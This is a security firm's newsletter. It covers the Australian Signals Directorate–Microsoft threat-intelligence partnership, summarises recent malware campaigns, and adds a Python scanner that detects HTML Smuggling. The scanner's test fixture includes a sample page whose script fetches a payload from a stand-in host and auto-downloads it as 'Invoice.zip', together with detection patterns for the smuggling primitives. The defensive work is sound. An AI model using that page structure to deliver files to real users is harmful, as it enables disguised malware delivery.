#NSBCS.018 - The Road Ahead: The Importance of Public and Private Partnerships


Source: NSB Cyber


The Road Ahead: The Importance of Public and Private Partnerships

Australia's cybersecurity posture is poised for a significant upgrade with the announcement of a collaborative effort between the Australian Signals Directorate (ASD) and Microsoft. This partnership goes beyond simply using Microsoft products; it aims to integrate Microsoft’s Sentinel platform directly with ASD's Cyber Threat Intelligence Sharing (CTIS) platform. This integration will create the Microsoft-Australian Signals Directorate’s Cyber Shield (MACS), a crucial link facilitating the rapid exchange of critical cyber threat information, ultimately strengthening Australia's digital defences.

Prior to this collaboration, Australian organisations might have been using Microsoft security solutions while also participating in the ASD's CTIS platform; however, these initiatives functioned somewhat independently. Australian entities that are customers of Microsoft and also partners in the CTIS program can now seamlessly share and receive real-time cyber threat intelligence directly through the integrated platform. This eliminates the need for separate communication channels and significantly reduces the time it takes for critical threat data to reach the relevant parties.

Benefits and Potential Impact:

The ASD-Microsoft partnership offers a multitude of advantages for Australia's cybersecurity landscape:

  • Enhanced Threat Detection and Response: The real-time exchange of threat information allows for faster identification and mitigation of cyberattacks. By sharing data instantaneously, Australian organisations can proactively address emerging threats before they cause significant disruption.

  • Improved Visibility and Collaborative Efforts: The integration offers a more comprehensive view of the ever-evolving cyber threat landscape. This broader perspective allows for better informed decision-making at all levels. Public and private sector entities can collaborate more effectively, leading to the development and implementation of national cybersecurity strategies that address the most pressing threats.

  • Strengthened Threat Intelligence Sharing: Streamlined information sharing strengthens Australia's overall cyber resilience. With a more robust intelligence network, the nation can better anticipate and defend against sophisticated cyberattacks. This collaborative approach fosters a more unified front against cyber threats, making it more difficult for malicious actors to exploit vulnerabilities.

The ASD-Microsoft collaboration serves as a prime example of the importance of public-private partnerships in combating cyber threats. By leveraging the expertise and resources of both sectors, Australia can create a more secure digital environment for businesses, government agencies, and individual citizens. This initiative paves the way for a future where real-time threat intelligence sharing and collaborative efforts form the cornerstone of Australia's national cybersecurity strategy.

The success of this partnership can serve as a model for future collaborations, not just within Australia but on a global scale. As the cyber threat landscape continues to evolve, international cooperation and the exchange of vital information will be crucial in safeguarding the digital world from taking #NoStepsBackward!

For information on NSB Cyber’s Cyber Threat Intelligence capabilities or to book a meeting with our team, click here.


What we read this week

  • APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme - The Russia-linked threat actor group known as APT28 has been flagged for launching multiple phishing campaigns against a wide range of victims across Europe, the Americas, the South Caucasus, and Central Asia. APT28 uses phishing emails disguised as communications from legitimate government and non-governmental organisations (NGOs) to compromise victims. Once a user clicks on a malicious link or attachment, malware such as MASEPIE, OCEANMAP, or STEELHOOK is deployed on their system.

  • Hackers Using Cracked Software on GitHub to Spread RisePro Info Stealer - Cybersecurity researchers have uncovered a malware distribution campaign targeting unsuspecting users through cracked software offered on GitHub repositories. The campaign leverages cracked software readily available on GitHub to distribute RisePro, an information-stealing malware. Attackers upload compromised versions of popular software laced with RisePro to GitHub repositories; when users download and install these cracked versions, RisePro is installed on their systems in the background. Security firm G DATA has identified 17 repositories associated with 11 GitHub accounts containing the malicious software.

  • Australia and Five Eyes allies issue new Volt Typhoon advisory - A joint security advisory issued by the intelligence alliance known as Five Eyes reveals an ongoing cyber threat from China. The advisory, published by the United States Cybersecurity and Infrastructure Security Agency (CISA), highlights the activities of Chinese state-sponsored hacking groups collectively referred to as Volt Typhoon. These groups have been targeting critical infrastructure providers in the United States and potentially other Five Eyes countries (Australia, Canada, New Zealand, and the United Kingdom). Volt Typhoon is known for its use of living off the land (LOTL) techniques which leverage legitimate system tools and functionalities to perform malicious activities, making them difficult to detect. The advisory warns that Volt Typhoon may have had access to critical infrastructure networks for at least five years, raising concerns about potential disruptions to essential services.

  • StopCrypt: Most widely distributed ransomware evolves to evade detection - There have been recent reports of a new variant of the StopCrypt ransomware exhibiting advanced evasion tactics. StopCrypt, also known as STOP Djvu, is one of the most prevalent ransomware strains, though it often operates under the radar compared to its high-profile counterparts. This new variant employs a multi-stage execution process to bypass security measures. The malware initially loads a seemingly unrelated DLL file, potentially as a decoy, and it also implements time-delaying loops and dynamically constructs API calls to hinder detection.

  • Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites - Cybersecurity researchers have uncovered a novel malware campaign exploiting a technique called "HTML Smuggling" to distribute the AZORult information stealer. Attackers create counterfeit Google Docs pages using Google Sites; the HTML Smuggling technique involves embedding malicious code within seemingly legitimate HTML content so that the payload is assembled in the victim's browser rather than downloaded directly. In this case, the fake Google Docs page retrieves the malicious payload from a separate JSON file hosted on another website. The combination of fake Google Docs pages and HTML Smuggling lends the phishing attempt an air of legitimacy, potentially tricking unsuspecting victims into interacting with the malicious content.
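The HTML Smuggling item above describes a page that rebuilds its payload inside the browser from a blob fetched from elsewhere. The following heuristic scanner is an added example written for this newsletter and is not code from NSB Cyber or from the cited article: it scores an HTML document on the JavaScript primitives that such pages rely on (Blob construction, object URLs, a programmatic download attribute, base64 decoding), on runtime fetches of an external payload, and on long inline base64 runs that decode to a recognisable file header. The two sample pages, the `payload.example.invalid` host and the `Invoice.zip` filename are constructed for the example; a real deployment would run `scan_html` over mail-gateway attachments or proxy-captured HTML.

```python
"""Heuristic HTML Smuggling indicator scanner (added example, not from the page)."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List

# JavaScript fragments that, in combination, indicate a file being assembled
# and dropped on the client side instead of being served as a normal download.
INDICATORS = {
    "blob_constructor": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "download_attribute": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']", re.I),
    "base64_decode": re.compile(r"\batob\s*\("),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob|msSaveBlob"),
}
# A payload pulled from another origin at runtime, as in the fake Google Docs
# page that fetches its payload from a JSON file hosted on another site.
EXTERNAL_FETCH = re.compile(r"\bfetch\s*\(\s*[\"'](https?://[^\"']+)[\"']")
# Long base64 runs: a payload inlined directly into the HTML.
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
# File-format magic bytes worth flagging when they appear inside a decoded run.
MAGIC = {b"MZ": "pe", b"PK\x03\x04": "zip", b"%PDF": "pdf", b"\x7fELF": "elf"}


@dataclass
class Finding:
    indicators: List[str] = field(default_factory=list)
    external_urls: List[str] = field(default_factory=list)
    embedded_types: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        # Payload sources weigh more than individual JS primitives.
        return len(self.indicators) + 2 * len(self.external_urls) + 3 * len(self.embedded_types)

    @property
    def suspicious(self) -> bool:
        # Tripwire: at least two drop primitives plus some payload source. A lone
        # download attribute on a normal link must not trigger on its own.
        return len(self.indicators) >= 2 and bool(self.external_urls or self.embedded_types)


def scan_html(html: str) -> Finding:
    """Return the smuggling indicators found in one HTML document."""
    finding = Finding()
    for name, pattern in INDICATORS.items():
        if pattern.search(html):
            finding.indicators.append(name)
    finding.external_urls = EXTERNAL_FETCH.findall(html)
    for run in LONG_BASE64.findall(html):
        try:
            raw = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue  # long identifier or minified JS, not base64
        for magic, kind in MAGIC.items():
            if raw.startswith(magic):
                finding.embedded_types.append(kind)
    return finding


# Constructed sample: a ZIP header padded with zeros, inlined as base64.
EMBEDDED_ZIP = base64.b64encode(b"PK\x03\x04" + b"\x00" * 200).decode()

# Constructed sample page mimicking the pattern described in the article.
SMUGGLING_PAGE = f"""<html><body>
<h1>Google Docs</h1><p>Loading document...</p>
<script>
  fetch("https://payload.example.invalid/doc.json").then(r => r.json()).then(j => {{
    const bytes = Uint8Array.from(atob(j.data), c => c.charCodeAt(0));
    const blob = new Blob([bytes], {{type: "application/octet-stream"}});
    const a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "Invoice.zip";
    a.click();
  }});
  var inline = "{EMBEDDED_ZIP}";
</script></body></html>"""

# Constructed benign page: a plain download link should not trip the scanner.
BENIGN_PAGE = """<html><body><h1>Quarterly report</h1>
<script>document.querySelector("h1").textContent += " (2024)";</script>
<a href="/files/report.pdf" download="report.pdf">Download</a></body></html>"""


if __name__ == "__main__":
    for label, page in (("smuggling", SMUGGLING_PAGE), ("benign", BENIGN_PAGE)):
        f = scan_html(page)
        print(f"{label}: score={f.score} suspicious={f.suspicious} "
              f"indicators={f.indicators} external={f.external_urls} embedded={f.embedded_types}")
```

The scanner is deliberately conservative: a `download` attribute on an ordinary anchor is common on legitimate sites, so it only contributes to the score and cannot trigger a verdict alone. Pages that obfuscate the JavaScript further will evade these literal patterns, which is why the external-fetch and decoded-magic checks are weighted separately as payload evidence.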

References
https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
https://thehackernews.com/2024/03/hackers-using-cracked-software-on.html
https://www.cyberdaily.au/security/10349-australia-and-five-eyes-allies-issue-new-volt-typhoon-advisory
https://www.bleepingcomputer.com/news/security/stopcrypt-most-widely-distributed-ransomware-evolves-to-evade-detection/
https://thehackernews.com/2024/03/hackers-using-sneaky-html-smuggling-to.html